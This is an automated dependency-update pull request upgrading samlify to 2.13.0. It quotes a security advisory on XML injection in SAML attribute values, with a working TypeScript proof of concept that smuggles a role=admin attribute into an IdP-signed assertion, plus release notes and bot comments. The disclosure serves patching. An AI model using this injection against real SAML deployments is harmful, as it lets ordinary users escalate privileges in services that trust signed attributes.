fix(deps): update dependency samlify to v2.13.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
samlify	2.10.0 → 2.13.0

---

samlify: XML Injection in AttributeValue Allows Privilege Escalation in Signed SAML Assertions

CVE-2026-46490 / GHSA-34r5-q4jw-r36m

More information

Details

Summary

samlify’s template substitution only escapes attribute contexts. Values inserted into element text (e.g., <saml:AttributeValue>) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new <saml:Attribute> elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups).

Root Cause

src/libsaml.ts → replaceTagsByValue() only escapes placeholders when preceded by a quote (attribute context). Element text is inserted raw. The attribute builder inserts placeholders into element text:

<saml:AttributeValue ...>{attrUserX}</saml:AttributeValue>

Therefore, </saml:AttributeValue>…<saml:Attribute …> is accepted and signed.

Proof-of-concept

• poc/attribute_injection.ts

import { readFileSync } from 'fs';
import * as samlify from '../index';
import * as validator from '@​authenio/samlify-xsd-schema-validator';

samlify.setSchemaValidator(validator);

const { IdentityProvider, ServiceProvider, SamlLib: libsaml, Utility: util } = samlify as any;

const loginResponseTemplate = {
  context: '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="{ID}" Version="2.0" IssueInstant="{IssueInstant}" Destination="{Destination}" InResponseTo="{InResponseTo}"><saml:Issuer>{Issuer}</saml:Issuer><samlp:Status><samlp:StatusCode Value="{StatusCode}"/></samlp:Status><saml:Assertion ID="{AssertionID}" Version="2.0" IssueInstant="{IssueInstant}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><saml:Issuer>{Issuer}</saml:Issuer><saml:Subject><saml:NameID Format="{NameIDFormat}">{NameID}</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="{SubjectConfirmationDataNotOnOrAfter}" Recipient="{SubjectRecipient}" InResponseTo="{InResponseTo}"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="{ConditionsNotBefore}" NotOnOrAfter="{ConditionsNotOnOrAfter}"><saml:AudienceRestriction><saml:Audience>{Audience}</saml:Audience></saml:AudienceRestriction></saml:Conditions>{AttributeStatement}</saml:Assertion></samlp:Response>',
  attributes: [
    { name: 'mail', valueTag: 'user.email', nameFormat: 'urn:oasis:names:tc:SAML:2.0:attrname-format:basic', valueXsiType: 'xs:string' },
    { name: 'injection', valueTag: 'user.injection', nameFormat: 'urn:oasis:names:tc:SAML:2.0:attrname-format:basic', valueXsiType: 'xs:string' },
  ],
};

const idp = IdentityProvider({
  privateKey: readFileSync('./test/key/idp/privkey.pem'),
  privateKeyPass: 'q9ALNhGT5EhfcRmp8Pg7e9zTQeP2x1bW',
  isAssertionEncrypted: false,
  metadata: readFileSync('./test/misc/idpmeta.xml'),
  loginResponseTemplate,
});

const sp = ServiceProvider({
  privateKey: readFileSync('./test/key/sp/privkey.pem'),
  privateKeyPass: 'VHOSp5RUiBcrsjrcAuXFwU1NKCkGA8px',
  isAssertionEncrypted: false,
  metadata: readFileSync('./test/misc/spmeta.xml'),
});

const buildTemplate = (_idp: any, _sp: any, _binding: any, user: any) => (template: string) => {
  const now = new Date();
  const fiveMinutesLater = new Date(now.getTime() + 300_000);
  const tvalue = {
    ID: _idp.entitySetting.generateID(),
    AssertionID: _idp.entitySetting.generateID(),
    Destination: _sp.entityMeta.getAssertionConsumerService('post'),
    Audience: _sp.entityMeta.getEntityID(),
    SubjectRecipient: _sp.entityMeta.getAssertionConsumerService('post'),
    NameIDFormat: 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress',
    NameID: user.email,
    Issuer: _idp.entityMeta.getEntityID(),
    IssueInstant: now.toISOString(),
    ConditionsNotBefore: now.toISOString(),
    ConditionsNotOnOrAfter: fiveMinutesLater.toISOString(),
    SubjectConfirmationDataNotOnOrAfter: fiveMinutesLater.toISOString(),
    InResponseTo: 'request-id',
    StatusCode: 'urn:oasis:names:tc:SAML:2.0:status:Success',
    attrUserEmail: user.email,
    attrUserInjection: user.injection,
  };

  return { id: tvalue.ID, context: libsaml.replaceTagsByValue(template, tvalue) };
};

async function main() {
  const injection = [
    'safe',
    '</saml:AttributeValue></saml:Attribute>',
    '<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">',
    '<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">admin</saml:AttributeValue>',
    '</saml:Attribute>',
    '<saml:Attribute Name="injection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">',
    '<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">safe'
  ].join('');

  const user = { email: 'user@esaml2.com', injection };
  const { context: SAMLResponse } = await idp.createLoginResponse(
    sp,
    { extract: { request: { id: 'request-id' } } },
    'post',
    user,
    buildTemplate(idp, sp, 'post', user)
  );

  const xml = util.base64Decode(SAMLResponse, true).toString();
  console.log('--- Generated XML snippet ---');
  console.log(xml.slice(xml.indexOf('<saml:AttributeStatement'), xml.indexOf('</saml:AttributeStatement>') + 26));

  const { extract } = await sp.parseLoginResponse(idp, 'post', { body: { SAMLResponse } });

  console.log('Parsed attributes:', extract.attributes);
}

main().catch(err => {
  console.error('PoC failed:', err?.message || err);
  process.exitCode = 1;
});

Run:

  npm install --legacy-peer-deps
  npx ts-node poc/attribute_injection.ts

Impact

A normal user can inject arbitrary attributes (e.g., role=admin) into a signed assertion and have them parsed by sp.parseLoginResponse(). This can grant elevated privileges in SPs that trust SAML attributes.

Severity

• CVSS Score: 8.7 / 10 (High)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m
• https://github.com/advisories/GHSA-34r5-q4jw-r36m

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

tngan/samlify (samlify)

v2.13.0

Compare Source

What's Changed

• Bump @​xmldom/xmldom from 0.8.11 to 0.8.12 by @​dependabot[bot] in #​603
• Bump @​xmldom/xmldom from 0.8.12 to 0.8.13 by @​dependabot[bot] in #​605
• Bump postcss from 8.5.6 to 8.5.12 by @​dependabot[bot] in #​606
• fix: reject promises with Error instances, not raw strings (#​581) by @​tngan in #​607
• feat: support simpleSign binding for logout request/response (#​584) by @​tngan in #​608
• docs: correct the parseResult example in saml-response (#​518) by @​tngan in #​609
• docs: clarify that wantMessageSigned and signatureConfig are SP options (#​516) by @​tngan in #​610
• RFC-0001: introduce .skills/ and mandatory SAML 2.0 spec citation workflow by @​tngan in #​611
• feat: per-request relayState for login + logout (closes #​163) by @​tngan in #​612
• sec: 2026-04 audit — patch vite, fix XXE bypass, reject unknown sig algs by @​tngan in #​613
• fix: omit AuthnRequest attributes whose value is null/undefined (closes #​455) by @​tngan in #​614
• fix: pass SessionIndex through createLogoutRequest (closes #​470) by @​tngan in #​615
• fix: throw a clear error when redirect binding has no SSO/SLO endpoint (closes #​308 #​405) by @​tngan in #​617
• fix: surface SP/IdP signing flags in ERR_METADATA_CONFLICT_REQUEST_SIGNED_FLAG (closes #​453) by @​tngan in #​616
• fix: default signatureConfig for SP when wantMessageSigned is true (closes #​454) by @​tngan in #​619
• feat: per-request ForceAuthn for createLoginRequest (closes #​359) by @​tngan in #​618
• feat: support tagPrefix.protocol and tagPrefix.assertion on IdP (closes #​388) by @​tngan in #​620
• fix: invoke customTagReplacement even without explicit template (closes #​549) by @​tngan in #​621
• feat: support elementsOrder option on IdP metadata (closes #​429) by @​tngan in #​622
• feat: support RSASSA-PSS signature algorithms (closes #​624) by @​tngan in #​625
• feat: per-request AssertionConsumerServiceIndex for createLoginRequest (closes #​437) by @​tngan in #​623

Security Audit

GHSA-34r5-q4jw-r36m (credit to @​RootUp)

Full Changelog: tngan/samlify@v2.12.0...v2.13.0

v2.12.0

Compare Source

What's Changed

• fix: security audit - XPath injection, XXE protection, dependency update ab87376
• fix: maintain the commonjs build and remove camel case lib import by @​tngan in #​601

Full Changelog: tngan/samlify@v2.11.0...v2.12.0

v2.11.0

Compare Source

What's Changed

• [fix] Replace node-forge with Node.js native crypto by @​simplyluke in #​598
• Bump rollup from 4.53.2 to 4.59.0 by @​dependabot[bot] in #​597
• Bump minimatch from 3.1.2 to 3.1.5 by @​dependabot[bot] in #​596
• Bump preact from 10.27.2 to 10.28.2 by @​dependabot[bot] in #​593
• Bump mdast-util-to-hast from 13.2.0 to 13.2.1 by @​dependabot[bot] in #​589

New Contributors

• @​simplyluke made their first contribution in #​598

Full Changelog: tngan/samlify@v2.10.2...v2.11.0

v2.10.2

Compare Source

What's Changed

• Refactor to support encrypted assertions by @​ahacker1-securesaml in #​571
• Doc update and fix the test build by @​tngan in #​585
• Bump node-forge from 1.3.1 to 1.3.2 by @​dependabot[bot] in #​587
• Bump js-yaml from 3.14.1 to 3.14.2 by @​dependabot[bot] in #​586

New Contributors

• @​ahacker1-securesaml made their first contribution in #​571

Full Changelog: tngan/samlify@v2.10.0...v2.10.2

v2.10.1

Compare Source

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[Copilot]

Copilot encountered an error and was unable to review this pull request. You can try again by re-requesting a review.

[github-actions]

COMPARE TO master

Total Size Diff 📉 -4 Bytes

Diff by File

Name	Diff
packages/connectors/connector-saml/package.json	0 Bytes
packages/core/package.json	0 Bytes
pnpm-lock.yaml	📉 -4 Bytes

[Copilot]

Copilot encountered an error and was unable to review this pull request. You can try again by re-requesting a review.

[Copilot]

Copilot encountered an error and was unable to review this pull request. You can try again by re-requesting a review.

[Copilot]

Copilot encountered an error and was unable to review this pull request. You can try again by re-requesting a review.

[Copilot]

Copilot encountered an error and was unable to review this pull request. You can try again by re-requesting a review.